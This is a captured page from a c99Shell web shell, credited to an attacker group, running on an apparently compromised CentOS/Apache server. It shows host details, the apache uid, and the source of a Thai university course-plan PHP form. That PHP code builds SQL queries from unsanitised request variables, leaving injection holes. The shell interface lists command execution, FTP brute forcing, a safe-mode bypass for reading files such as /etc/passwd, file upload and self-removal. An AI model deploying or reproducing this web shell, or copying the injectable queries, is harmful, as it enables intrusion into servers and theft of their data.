!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/edu_depart/   drwxr-xr-x
Free 52.6 GB of 127.8 GB (41.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     FrmCoseMethod.php (19.11 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

	session_start();
	
	/**  Define Validate Access  */
	define( '_VALID_ACCESS', 1 );

	/**  Check Session User Login  */
	if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) {
		echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
		echo "<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
		echo "<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
		exit();
	} 
	else {
		/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
		require_once( "../include/Function.php" );
	
		/**  Create Database Object  */
		$dbObj = new DBConn;

		//=== SESSION
		$Username = $valid_user; 
		
		
		/**  Config Table for This Page  */
		$myTable1 = "tech_corseplan_tb";
		
		/**  Table  -->  personal_tb  */
		$query1 = " SELECT *  FROM $myTable1  WHERE   corsett ='$corsett'     ";
		$result1 = $dbObj->execQuery($query1);
		$rs1 = $dbObj->fetchArray($result1);
		
		$courseId = $rs1['courseId'];
		
	
	} # else
 ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link href="../css/default.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="../js/utilities.js"></script>
<script language="javascript" src="../js/calendarDateInput2.js"></script>
<script language="javascript">
function checkData() {
var formObj = document.myForm;
	if( (formObj.courseCode.value == "" ) && (formObj.courseName.value == "" ) && (formObj.courseUnit.value == "" ) ) { alert("กรุณากรอกข้อมูลให้ครบด้วยค่ะ" ); formObj.courseCode.style.backgroundColor='#F1F9FC'; formObj.courseCode.focus();	return false; }
	else if(formObj.courseCode.value == "" ) { alert("กรุณากรอก รหัสวิชา"); formObj.courseCode.style.backgroundColor='#F1F9FC'; formObj.courseCode.focus(); return false;} 
	else if(formObj.courseName.value == "" ) { alert("กรุณากรอก ชื่อวิชา"); formObj.courseName.style.backgroundColor='#F1F9FC'; formObj.courseName.focus(); return false;} 
	else if(formObj.courseUnit.value == "" ) { alert("กรุณากรอก หน่วยกิจ"); formObj.courseUnit.style.backgroundColor='#F1F9FC'; formObj.courseUnit.focus(); return false;} 
	else if(formObj.Total_std.value == "" ) { alert("กรุณากรอก จำนวนนักศึกษา"); formObj.Total_std.style.backgroundColor='#F1F9FC'; formObj.Total_std.focus(); return false;}
	else if(formObj.Total_hour.value == "" ) { alert("กรุณากรอก จำนวนชั่วโมง"); formObj.Total_hour.style.backgroundColor='#F1F9FC'; formObj.Total_hour.focus(); return false;}
	else if(formObj.Mainidea.value == "" ) { alert("กรุณากรอก แนวคิดหลัก"); formObj.Mainidea.style.backgroundColor='#F1F9FC'; formObj.Mainidea.focus(); return false;}
	else if(formObj.Objective.value == "" ) { alert("กรุณากรอก วัตถุประสงค์"); formObj.Objective.style.backgroundColor='#F1F9FC'; formObj.Objective.focus(); return false;}
	else return true ;
}
</script>
<script language="JavaScript" type="text/JavaScript">
function browse()
{
	myForm.Filetex.src = myForm.Filetex.value;
}
</script>

<title>ข้อมูลทั่วไปบุคลากร - ข้อมูลแผนการสอน - เพิ่มข้อมูลแผนการสอน</title>
</head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">
<?php
	include("../templates/incHeader.php");
?>
<table width="1003" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="203" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include("./_incMainMenu.php");?></td>
    <td width="800" height="440" align="center" valign="top" style="padding:10px 0px 5px 10px"><fieldset>
     <table width="780" border="0" cellspacing="0" cellpadding="0">
      <form id="myForm" name="myForm" method="post"   enctype="multipart/form-data" action="EditCorseMethod.php?courseId=<?=$courseId;?>&acadYear=<?=$rs1['acadYear'];?>&corsett=<?=$corsett ; ?>" onSubmit="return checkData()">
      <tr>
        <td height="5"></td>
      </tr>
      <tr>
        <td height="30" background="../images/background/bg-head-topic-w780.gif" class="PADDING-LEFT-10"><strong><a href="index.php">หน้าหลัก</a></strong> <strong>&raquo; <a href="CourseTeachList.php?acadYear=<?=$rs1['acadYear'];?>">รายวิชาที่เปิดสอน</a> &raquo; <span class="NOTE">แก้ไขข้อมูลรายวิชาตามแผนการสอน</span></strong></td>
        </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td><span class="PADDING-TOP-10 PADDING-BOTTOM-10"><img src="../images/icons/arrow-circle-225-left.png" width="16" height="16" border="0" align="absmiddle" /> <a href="javascript:;" onclick="window.history.back();"><strong>&lsaquo; ย้อนกลับ</strong></a></span></td>
      </tr>
      <tr>
    
        <td align="center"><table width="750" border="0" align="center" cellpadding="1" cellspacing="3" bgcolor="#EEEEEE" style="border:1px solid #EEEEEE">
          <tr bgcolor="#eeeeee">
            <td colspan="2" align="right" bordercolor="#99CC99" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td width="23%" align="right" bordercolor="#99CC99" bgcolor="#FFFFFF"><font color="#000066" face="Tahoma">หลักสูตร:</font></td>
            <? 
			       // $query = " SELECT *  FROM    tech_courseteacher    WHERE     courseId = '$courseId'      ";
					//$result2 = mysql_query($query);
	         		//$checkData1 = mysql_num_rows($result2); 
					?>
            <td width="76%" bordercolor="#CCCCCC" bgcolor="#FFFFFF"><select name="programId" id="programId"<?=($checkData1)?"disabled":"";?> >
              <?php
			    $dbObj->RegDBConn();
				$strSQL11 = " SELECT * FROM  Program   WHERE programStatus='Y' ";
				$result11 = mysql_query($strSQL11);
				while( $rs11 = mysql_fetch_array($result11) ) {
				?>
              <option value="<?=$rs11['programId'];?>" <?php if( $rs11[programId] == $rs1[programId] ) echo 'selected';?>>
                <?=$rs11['programName'];?>
                </option>
              <?php
				} # while
				?>
            </select></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" bordercolor="#99CC99" bgcolor="#FFFFFF"><span class="TEXT-DARK-BLUE10"> ภาค/ปีการศึกษา:</span></td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF">
              <select name="semester" id="semester">
				<?php
					$strSQL1 = " SELECT * FROM SysSemesterDes";
					$result1 = mysql_query($strSQL1);
					while( $rs2 = mysql_fetch_array($result1) ) {
						echo"<option value=\"$rs2[semester]\" ".(($rs2[semester]==$rs1[semester])?"selected":"")."><b>$rs2[semesterName]</b></option>\n";
					}				
				?>
              </select>
              /
			  <select name="acadYear" id="acadYear">                
				<?php
					$strSQL1 = "SELECT * FROM AcadYearConfig GROUP BY acadYear";
					$result1 = mysql_query($strSQL1);
					while( $rs2 = mysql_fetch_array($result1) ) {
						echo"<option value=\"$rs2[acadYear]\" ".(($rs2["acadYear"]==$rs1["acadYear"])?"selected":"")."><b>$rs2[acadYear]</b></option>\n";
					}				
				?>
              </select>
              จำนวนนักศึกษา
              <input name="TotalStudent" type="text" id="TotalStudent" style="text-align:center" onkeypress="return checkNumeric();" value="<?=$rs1['TotalStudent'];?>" size="3" maxlength="4" />
            </td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" bordercolor="#99CC99" bgcolor="#FFFFFF">ชั้นปี:</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><select name="studentYear" onchange="doChange()">
              <option value="">--เลือก--</option>
              <?php
				    $strSQL = " SELECT * FROM    SysStudentYearDes   ";
				    $result2 = mysql_query($strSQL);
				      while( $rs2 = mysql_fetch_array($result2) ) { 
				?>
              <option value="<?php echo $rs2['studentYear'];?>" <?php echo ($rs2['studentYear']==$rs1['studentYear'] ) ? 'selected' : '';?>>
                <?php  echo $rs2['studentYear'];?>
                </option>
              <?php
				}
?>
            </select>
              วัน
              <?php
			    $sql = " SELECT * FROM   Day    ";
				$result3 = mysql_query($sql);
				while( $rss3 = mysql_fetch_array($result3) ) {
			// $i = 1;
			//$oDy->RSDay();
			//while($oDy->GetRecord()) {
?>
              <input type="checkbox" name="dayId[<?php echo $i;?>]" value="<?php echo $rs1['dayId'];?>" <?php  echo ($rs1['dayId']==$dayId[$i] ) ? 'checked' : '';?> />
              <font size="2"><?php echo $rss3['dayName'];?>&nbsp;&nbsp;</font>
              <?php
				$i++;
			}
?>
              <font color="<?php echo $GLOBALS['COLOR_FONT_3'];?>">*</font></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" bordercolor="#99CC99" bgcolor="#FFFFFF">จากคาบ :</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><select name="startTime" class="input" id="startTime">
              <?php
				$strSQL = " SELECT * FROM   Period    ";
				$result3= mysql_query($strSQL);
				while( $rs3 = mysql_fetch_array($result3) ) {
					?>
              <option value="<?php echo $rs3['period'];?>" <?php echo ($rs3['period']==$rs1['startTime'] ) ? 'selected' : '';?> >
                <?php  echo $rs3['startTime'];?>
                </option>
              <?php
				}

             
				//	echo"<option value=\"$rs2[period]\" ><b>$rs2[startTime]</b></option>\n";
				
				?>
            </select>
              ถึงคาบ
              <select name="endTime" class="input" id="endTime">
                <?php
				$strSQL = " SELECT * FROM   Period    ";
				$result3= mysql_query($strSQL);
				while( $rs4 = mysql_fetch_array($result3) ) {
					?>
                <option value="<?php echo $rs4['period'];?>" <?php echo ($rs4['period']==$rs1['endTime'] ) ? 'selected' : '';?> >
                  <?php  echo $rs4['endTime'];?>
                  </option>
                <?php
				}

             
				//	echo"<option value=\"$rs2[period]\" ><b>$rs2[startTime]</b></option>\n";
				
				?>
              </select>
              จำนวนสัปดาห์
              <input name="TotalWeek" type="text" id="TotalWeek" style="text-align:center" onkeypress="return checkNumeric();" value="<?=$rs1['TotalWeek'];?>"  size="3" maxlength="2" /></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" bordercolor="#99CC99" bgcolor="#FFFFFF"><font color="#000066" face="Tahoma">ภาคงานสอน:</font></td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><select name="Method_code" id="Method_code">
              <?php
			    $dbObj->DBConn();
				$strSQL22 = " SELECT * FROM method_tb ";
				$result22 = mysql_query($strSQL22);
				while( $rs22 = mysql_fetch_array($result22) ) {
				?>
              <option value="<?=$rs22['Method_code'];?>" <?php if( $rs1[Method_code] == $rs22[Method_code] ) echo 'selected';?>>
                <?=$rs22['Method_name'];?>
                </option>
              <?php
                } # while
				$dbObj->RegDBConn();
				?>
            </select>
              &nbsp;<font color="#000066" face="Tahoma">แหล่งฝึก</font>
              <input name="Place" type="text" id="Place" value="<?=$rs1['Place'];?>" size="49" /></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" bordercolor="#99CC99" bgcolor="#FFFFFF"><font color="#000066" face="Tahoma">รายวิชา:</font></td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><input name="courseCode" type="text" class="input1" style="text-align:center" value="<?=$rs1['courseCode'];?>" size="7" readonly="readonly" />
              <?php
                	$strSQL33 = " SELECT * FROM  Course   WHERE  courseId='$rs1[courseId]' ";
					$result33 = mysql_query($strSQL33);
					$rs33 = mysql_fetch_array($result33);
				?>
              <input name="courseName" type="text" class="input1" value="<?=$rs33['courseName'];?>" size="48" readonly="readonly" />
              <input name="courseUnit" type="text" class="input1" style="text-align:center" value="<?=$rs33['courseUnit'];?>" size="7" readonly="readonly" />
              <a href="javascript:;" onclick="NewWindow('ShowtechCose.php','courseInClassTable','860','350','yes')"><img src="../images/icons/search.gif" width="15" height="19" border="0" align="absmiddle" /></a><span class="TEXT-RED10"><sup>*</sup><span class="TEXT-ORANGE9">&lt;-- คลิ๊กที่นี่
                <input name="courseId" type="hidden" value="<?php echo $rs1["courseId"] ;?>" />
                <input name="conditionId" type="hidden" value="<?php echo $rs1["conditionId"] ;?>" />
              </span></span></td>
          </tr>
          <tr>
            <td height="22" align="right" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">วันที่เริ่มการสอน:</td>
            <td bgcolor="#FFFFFF">
				<script>DateInput('mDate', true,'DD/MM/YYYY','<?=(isset($rs1[Date_start]))?ymdT2dmyE($rs1[Date_start]):date("d/m/Y");?>');</script>
			</td>
          </tr>
          <tr>
            <td height="22" align="right" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">วันที่สิ้นสุดการสอน:</td>
            <td bgcolor="#FFFFFF">
				<script>DateInput('mDate1', true,'DD/MM/YYYY','<?=(isset($rs1[Date_finish]))?ymdT2dmyE($rs1[Date_finish]):date("d/m/Y");?>');</script>
			</td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top" bordercolor="#99CC99" bgcolor="#FFFFFF">คำอธิบายรายวิชา:</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><textarea name="Mainidea" cols="75" rows="3" id="Mainidea"><?=$rs33['description'];?></textarea></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top" bordercolor="#99CC99" bgcolor="#FFFFFF" style="padding-top:4px">&nbsp;</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
		         <tr bgcolor="#eeeeee">
            <td align="right" valign="top" bordercolor="#99CC99" bgcolor="#FFFFFF" style="padding-top:4px">&nbsp;</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF">
            <table width="463" border="0" align="left" cellpadding="1" cellspacing="1">
              <tr>
			      <td width="21" align="center" bgcolor="#CCCCCC">&nbsp;</td>
                <td align="center" bgcolor="#CCCCCC">อาจารย์ประจำวิชา</td>
                <td align="center" bgcolor="#CCCCCC">หน้าที่้รับผิดชอบ</td>
                <td align="center" bgcolor="#CCCCCC">&nbsp;</td>
                <?php 
					$dbObj->DBConn();
				 	$query4 = " SELECT *  FROM   tech_courseteacher    WHERE     courseId = '$courseId'   and   corsett ='$corsett'   ";
					$result4 = mysql_query($query4);
						   while($rs4 = mysql_fetch_array($result4)){ ;
				
					     $bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF" ;						
			          ?>
              </tr>
                <tr bgcolor="<?=$bgColor;?>" onmouseover="this.style.backgroundColor='#F5F9F9'" onmouseout="this.style.backgroundColor=''">
                <td align="center"><img src="../images/icons/linesub.gif" width="16" height="16" border="0" align="absmiddle" /></td>
                <td width="189" align="left">
                  <?php
		
		 $sql = "Select *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId Where  Teacher_code ='$rs4[Teacher_code]' ";
          $result2 = mysql_query($sql) or die("Error".mysql_error());
		  $rss4 = mysql_fetch_array($result2);
          //echo "$rss4[Position_name] ";
		  echo  $rss4['First_name'] . $rss4['Teacher_name'] ." &nbsp;". $rss4['Teacher_lastname']  ;
		 ?>
               </td>
                <td width="220">
                  <?=$rs4['CourseTeach'] ;?>
                  </span></td>
                <td width="20"><a href="javascript:;" onclick="NewWindow('DelCourseTeach.php?courseId=<?=$rs4['courseId'];?>&costtId=<?=$rs4['costtId']?>','Detail','500','200','yes');"><img src="../images/icons/cross.png" width="16" height="16" align="absmiddle" border="0" onclick="return Conf<?=$rs4['costtId'];?>0(this)" alt="ลบข้อมูล<?=$rs4['costtId'];?>" /></a></td>
                </tr> 
                <?php
				} # while
          	?>
                    </table></td>
              
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top" bordercolor="#99CC99" bgcolor="#FFFFFF" style="padding-top:4px">&nbsp;</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" bordercolor="#99CC99" bgcolor="#FFFFFF"><font color="#000066" face="Tahoma">งานวิจัยในชั้นเรียน</font></td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><font color="#000066" face="Tahoma">
              <input type="radio" name="Res_unit" value="1" />
              <font color="#000000"> ใช้
                <input type="radio" name="Res_unit" value="2" />
                ไม่ใช้ </font></font></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top" bordercolor="#99CC99" bgcolor="#FFFFFF" style="padding-top:4px"><font color="#000066" face="Tahoma"></font></td>
            <td valign="top" bordercolor="#CCCCCC" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top" bordercolor="#99CC99" bgcolor="#FFFFFF" style="padding-top:4px"><font color="#000066">วิธีการวัดและประเมินผล</font></td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr bgcolor="#E5E5E5" class="BORDER-GREY-LIGHT" >
            <td align="right" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">&nbsp;</td>
            <td align="left" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr>
            <td bgcolor="#FFFFFF" align="center">&nbsp;</td>
            <td bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr>
            <td bgcolor="#FFFFFF" align="center">&nbsp;</td>
            <td bgcolor="#FFFFFF"><input name="corsett" type="hidden" id="corsett" value="<? echo $rs1['corsett']; ?>" />
              <input type="submit" name="Submit" value="บันทึก" class="WIDTH60 CURSOR-HAND" />
              &nbsp;
              <input type="reset" name="Reset" value="รีเซ็ต" class="WIDTH60 CURSOR-HAND" />
              &nbsp;&nbsp;
              <input type="button" name="Button" value="ยกเลิก" class="WIDTH60 CURSOR-HAND" onclick="location.href='PlanList.php?Teacher_code=<?=$Teacher_code;?>'" />
              <input name="courseId2" type="hidden" id="courseId2" value="<? echo $rs1['courseId']; ?>" />
			</td>
          </tr>
          <tr>
            <td bgcolor="#FFFFFF" align="center">&nbsp;</td>
            <td bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr></form>
    </table>
   </fieldset></td>
  </tr>
</table>
<?php include("../templates/incFooter.php"); ?>
</body>
</html>
<?php
	/**  Free Resource */
	$dbObj->freeresult($result1);
	
	/**  Close the Database  */
	$dbObj->disconn();
	
	/**  Unset Class  */
	unset($dbObj);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0062 ]--